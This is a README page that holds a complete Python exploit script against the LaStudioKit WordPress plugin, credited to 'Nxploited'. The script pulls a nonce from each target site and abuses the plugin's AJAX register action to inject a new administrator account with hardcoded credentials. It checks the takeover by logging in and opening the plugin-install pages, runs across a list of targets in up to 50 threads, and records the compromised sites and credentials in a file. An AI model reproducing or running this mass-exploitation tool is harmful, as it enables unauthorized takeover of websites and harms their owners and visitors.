README.md
Rendering markdown...
import threading
import requests
import random
import os
import sys
import urllib3
import warnings
from queue import Queue
from colorama import init, Fore, Style
import re
import time
# ======================= Init =======================
init(autoreset=True)
os.environ["NO_PROXY"] = "*"
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
warnings.filterwarnings("ignore", category=urllib3.exceptions.InsecureRequestWarning)
TELEGRAM_HANDLE = "@KNxploited"
GITHUB_HANDLE = "Nxploited"
# Credentials used in exploit
ADMIN_EMAIL = "[email protected]" # يمكنك تعديله
ADMIN_PASSWORD = "adminSA" # يمكنك تعديله
ADMIN_USERNAME = "Nx_admin" # يمكنك تعديله
RESULT_FILE = "success_results.txt"
MAX_THREADS = 50
BANNER = f"""{Fore.CYAN}
_____ _____ ___ __ ___ __ __ ___ ___ __
/ __\\ \\ / / __|_|_ ) \\_ )/ / ___ / \\/ _ \\_ ) \\
| (__ \\ V /| _|___/ / () / // _ \\___| () \\_, // / () |
\\___| \\_/ |___| /___\\__/___\\___/ \\__/ /_//___\\__/
{Style.RESET_ALL}{Fore.MAGENTA}
------------------------------------------------------------
By: Nxploited | GitHub: {GITHUB_HANDLE}
------------------------------------------------------------
{Style.RESET_ALL}
"""
# ======================= Logging helpers =======================
def log_info(site, msg):
ts = time.strftime("%H:%M:%S")
print(f"[{ts}] {Fore.CYAN}[*]{Style.RESET_ALL} {site} - {msg}")
def log_ok(site, msg):
ts = time.strftime("%H:%M:%S")
print(f"[{ts}] {Fore.GREEN}[+]{Style.RESET_ALL} {site} - {msg}")
def log_warn(site, msg):
ts = time.strftime("%H:%M:%S")
print(f"[{ts}] {Fore.YELLOW}[!]{Style.RESET_ALL} {site} - {msg}")
def log_err(site, msg):
ts = time.strftime("%H:%M:%S")
print(f"[{ts}] {Fore.RED}[-]{Style.RESET_ALL} {site} - {msg}")
# ======================= Helpers =======================
def random_user_agent():
agents = [
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
"(KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36",
"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:115.0) Gecko/20100101 Firefox/115.0",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 "
"(KHTML, like Gecko) Version/14.1.2 Safari/605.1.15",
]
return random.choice(agents)
def normalize_base(site: str) -> str:
site = site.strip()
if not site.startswith(("http://", "https://")):
site = "https://" + site
return site.rstrip("/")
# ======================= ajaxNonce extraction =======================
def extract_ajax_nonce(site: str, timeout: int = 10) -> str | None:
"""
يحاول استخراج ajaxNonce من أكثر من شكل وأكثر من مسار:
- "ajaxNonce": "value"
- ajaxNonce: "value"
- data-ajaxnonce / data-ajax-nonce داخل HTML attributes
"""
base = normalize_base(site)
headers = {"User-Agent": random_user_agent()}
# توسيع المسارات الشائعة للـ front page
paths = [
"",
"/",
"/index.php",
"/home",
"/start",
"/?page_id=1",
]
for path in paths:
url = base + path
try:
resp = requests.get(url, headers=headers, timeout=timeout, verify=False)
except Exception:
continue
if resp.status_code != 200:
continue
html = resp.text
# 1) الشكل الكلاسيكي في JSON/JS
m = re.search(r'"ajaxNonce"\s*:\s*"([a-zA-Z0-9_-]{5,})"', html)
if m:
return m.group(1)
# 2) أنماط أخرى في السكربت أو الـ data-attributes
patterns = [
r"ajaxNonce['\"]?\s*:\s*['\"]([a-zA-Z0-9_-]{5,})['\"]",
r"['\"]ajaxNonce['\"]\s*[:=]\s*['\"]([a-zA-Z0-9_-]{5,})['\"]",
r"data-ajaxnonce=['\"]([a-zA-Z0-9_-]{5,})['\"]",
r"data-ajax-nonce=['\"]([a-zA-Z0-9_-]{5,})['\"]",
]
for pat in patterns:
m2 = re.search(pat, html, re.IGNORECASE)
if m2:
return m2.group(1)
return None
# ======================= Exploit request =======================
def lakit_register_admin(
site: str,
nonce: str,
email: str,
password: str,
username: str,
timeout: int = 15,
) -> tuple[int, str]:
"""
تنفيذ استغلال LaStudioKit:
- entrypoint: /wp-admin/admin-ajax.php?action=lakit_ajax&_nonce=<nonce>
- action: register
- data:
* email / password / username
* lakit_field_log = "yes" -> استخدام الـ username المُرسل
* lakit_field_pwd = "yes" -> استخدام الـ password المُرسل
* lakit_field_cpwd = "no" -> تعطيل شرط password-confirm
* lakit_bkrole != empty -> تفعيل فلتر حقن meta (wp_capabilities=['administrator'=>1])
* lakit_recaptcha_response = "" (reCAPTCHA v3 غالبًا غير مفعّلة افتراضيًا)
"""
base = normalize_base(site)
endpoint = f"{base}/wp-admin/admin-ajax.php"
sess = requests.Session()
sess.verify = False
sess.headers.update(
{
"User-Agent": random_user_agent(),
"Accept": "*/*",
"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
}
)
actions_payload = (
"{"
'"req1":{'
'"action":"register",'
'"data":{'
f'"email":"{email}",'
f'"password":"{password}",'
f'"username":"{username}",'
'"lakit_field_log":"yes",'
'"lakit_field_pwd":"yes",'
'"lakit_field_cpwd":"no",'
'"lakit_bkrole":"1",'
'"lakit_recaptcha_response":""'
"}"
"}"
"}"
)
data = {
"action": "lakit_ajax",
"_nonce": nonce,
"actions": actions_payload,
}
try:
r = sess.post(endpoint, data=data, timeout=timeout, allow_redirects=True)
except Exception as e:
return 0, f"REQUEST_EXCEPTION: {e}"
return r.status_code, (r.text or "")
# ======================= Strong admin verification =======================
def verify_full_admin(site: str, username: str, password: str, timeout: int = 10) -> bool:
base = normalize_base(site)
login_url = f"{base}/wp-login.php"
sess = requests.Session()
sess.verify = False
headers = {"User-Agent": random_user_agent()}
try:
sess.get(login_url, timeout=timeout, verify=False, headers=headers)
except Exception:
pass
login_data = {
"log": username.strip(),
"pwd": password,
"wp-submit": "Log In",
"testcookie": "1",
}
headers = {
"User-Agent": random_user_agent(),
"Cookie": "wordpress_test_cookie=WP Cookie check",
"Content-Type": "application/x-www-form-urlencoded",
"Referer": login_url,
}
try:
r = sess.post(
login_url,
data=login_data,
headers=headers,
timeout=timeout,
verify=False,
allow_redirects=True,
)
except Exception:
return False
content = (r.text or "").lower()
failure_indicators = [
"incorrect username or password",
"invalid username",
"invalid password",
"error: the username",
"is not registered",
"authentication failed",
"login failed",
"unknown username",
"error: the password you entered",
]
if any(ind in content for ind in failure_indicators):
return False
success_indicators = [
"dashboard",
"wp-admin-bar",
"adminmenu",
"wp-admin/index.php",
"wp-admin/profile.php",
]
could_be_logged_in = any(ind in content for ind in success_indicators)
cookie_header = r.headers.get("Set-Cookie", "")
if "wordpress_logged_in" in cookie_header or any(
c.name.startswith("wordpress_logged_in") for c in sess.cookies
):
could_be_logged_in = True
if not could_be_logged_in:
return False
admin_urls = [
f"{base}/wp-admin/plugin-install.php",
f"{base}/wp-admin/plugin-install.php?tab=upload",
f"{base}/wp-admin/plugins.php?page=plugin-install",
]
try:
for u in admin_urls:
try:
rr = sess.get(
u,
timeout=timeout,
verify=False,
headers={"User-Agent": random_user_agent()},
allow_redirects=False,
)
except Exception:
continue
if rr.status_code == 200 and "wp-login.php" not in (rr.url or ""):
txt = (rr.text or "").lower()
installation_indicators = [
"plugin-install-tab",
"upload-plugin",
"plugin-upload-form",
"install-plugin-upload",
"pluginzip",
"browse plugins",
"add plugins",
]
if any(ind in txt for ind in installation_indicators):
return True
elif rr.status_code in (301, 302):
loc = rr.headers.get("Location", "")
if "wp-login.php" in loc:
return False
except Exception:
pass
return False
# ======================= Worker =======================
def worker(thread_id, targets_chunk, out_queue):
for site in targets_chunk:
base = normalize_base(site)
try:
print(Fore.BLUE + "-" * 70 + Style.RESET_ALL)
log_info(base, "Starting target")
nonce = extract_ajax_nonce(base)
if not nonce:
log_warn(base, "kay not found")
out_queue.put(("failed", site, "nonce-not-found"))
continue
log_ok(base, f"kay: {nonce}")
status_code, resp_text = lakit_register_admin(
base, nonce, ADMIN_EMAIL, ADMIN_PASSWORD, ADMIN_USERNAME
)
log_info(base, f"AJAX HTTP status: {status_code}")
# إزالة طباعة الرد الخام لتقليل الضوضاء في الترمنال
# print(Fore.MAGENTA + f"==== RAW AJAX RESPONSE ({base}) ====" + Style.RESET_ALL)
# print(resp_text)
# print(Fore.MAGENTA + "==== END RAW AJAX RESPONSE ====\n" + Style.RESET_ALL)
if status_code != 200:
log_warn(base, "Non-200 HTTP status from admin-ajax")
out_queue.put(("failed", site, f"http-{status_code}"))
continue
low = resp_text.lower()
response_success = False
success_markers = [
"created successfully",
'"success":true',
"'success':true",
'"type":"success"',
'"status":"success"',
]
if any(m in low for m in success_markers):
response_success = True
log_ok(base, "AJAX response indicates success")
login_ok = verify_full_admin(base, ADMIN_USERNAME, ADMIN_PASSWORD)
log_info(
base,
f"Full admin verification (login + plugin install access): "
f"{'OK' if login_ok else 'FAIL'}",
)
if response_success and login_ok:
print(Fore.GREEN + "=" * 60 + Style.RESET_ALL)
print(Fore.GREEN + "[ SUCCESS BLOCK ]" + Style.RESET_ALL)
print(
f"{Fore.GREEN}Site :{Style.RESET_ALL} {base}\n"
f"{Fore.GREEN}Result :{Style.RESET_ALL} SUCCESS\n"
f"{Fore.GREEN}AJAX OK :{Style.RESET_ALL} YES\n"
f"{Fore.GREEN}FULL ADMIN :{Style.RESET_ALL} YES (login + plugin install access)"
)
print(Fore.GREEN + "=" * 60 + Style.RESET_ALL)
status_line = (
f"{base} | USERNAME:{ADMIN_USERNAME} | EMAIL:{ADMIN_EMAIL} "
f"| PASSWORD:{ADMIN_PASSWORD} "
f"| LOGIN:FULL_ADMIN_OK "
f"| RESP_SUCCESS:YES "
f"| NONCE:{nonce}"
)
write_result(RESULT_FILE, status_line)
out_queue.put(("success", site))
elif response_success and not login_ok:
log_warn(
base,
"AJAX indicates success but full admin verification failed "
"(maybe account created without admin capabilities or mail/activation flow).",
)
out_queue.put(("failed", site, "ajax-success-login-failed"))
elif not response_success and login_ok:
log_warn(
base,
"Full admin login OK but no AJAX success marker "
"(possible pre-existing admin user or custom response).",
)
out_queue.put(("failed", site, "login-success-no-ajax-marker"))
else:
log_warn(base, "No AJAX success marker and full admin verification failed")
out_queue.put(("failed", site, "no-success-marker-and-login-failed"))
except Exception as e:
log_err(base, f"Exception: {e}")
out_queue.put(("failed", site, "exception"))
# ======================= Utils =======================
def chunkify(lst, n):
if n <= 0:
n = 1
return [lst[i::n] for i in range(n)]
def write_result(filename, data):
with open(filename, "a", encoding="utf-8") as f:
f.write(data + "\n")
def read_targets(filename):
targets = []
try:
with open(filename, "r", encoding="utf-8") as f:
for line in f:
url = line.strip()
if url:
targets.append(url)
except FileNotFoundError:
print(f"Targets file not found: {filename}")
sys.exit(1)
return targets
# ======================= Output helpers =======================
def print_success_global():
print(Fore.GREEN + "\n" + "#" * 60 + Style.RESET_ALL)
print(
Fore.GREEN
+ "# Exploit finished: some targets reported SUCCESS. #"
+ Style.RESET_ALL
)
print(
Fore.GREEN
+ f"# Results saved to: {RESULT_FILE:<35}#"
+ Style.RESET_ALL
)
print(Fore.GREEN + "#" * 60 + Style.RESET_ALL)
def print_failed_global():
print(Fore.RED + "\nNo successful targets detected." + Style.RESET_ALL)
def printer_loop(queue):
any_success = False
while True:
item = queue.get()
if item is None:
break
typ = item[0]
if typ == "success":
any_success = True
if any_success:
print_success_global()
else:
print_failed_global()
# ======================= Main =======================
def main():
print(BANNER)
print(
Fore.CYAN
+ " LaStudioKit Admin Register (Refined Exploit + Strong Verification)"
+ Style.RESET_ALL
)
print(Fore.CYAN + "-" * 70 + Style.RESET_ALL)
list_file = input("Enter targets list filename (e.g. list.txt): ").strip()
if not list_file:
list_file = "list.txt"
try:
num_threads = int(input("Enter number of threads (1-50): ").strip())
num_threads = max(1, min(num_threads, MAX_THREADS))
except Exception:
num_threads = 10
targets = read_targets(list_file)
if not targets:
print("No targets loaded.")
sys.exit(1)
safe_threads = min(num_threads, max(1, min(MAX_THREADS, len(targets))))
queue = Queue()
threads = []
chunks = chunkify(targets, safe_threads)
printer = threading.Thread(target=printer_loop, args=(queue,), daemon=True)
printer.start()
for i in range(safe_threads):
th = threading.Thread(target=worker, args=(i, chunks[i], queue), daemon=True)
th.start()
threads.append(th)
for th in threads:
th.join()
queue.put(None)
printer.join()
if __name__ == "__main__":
main()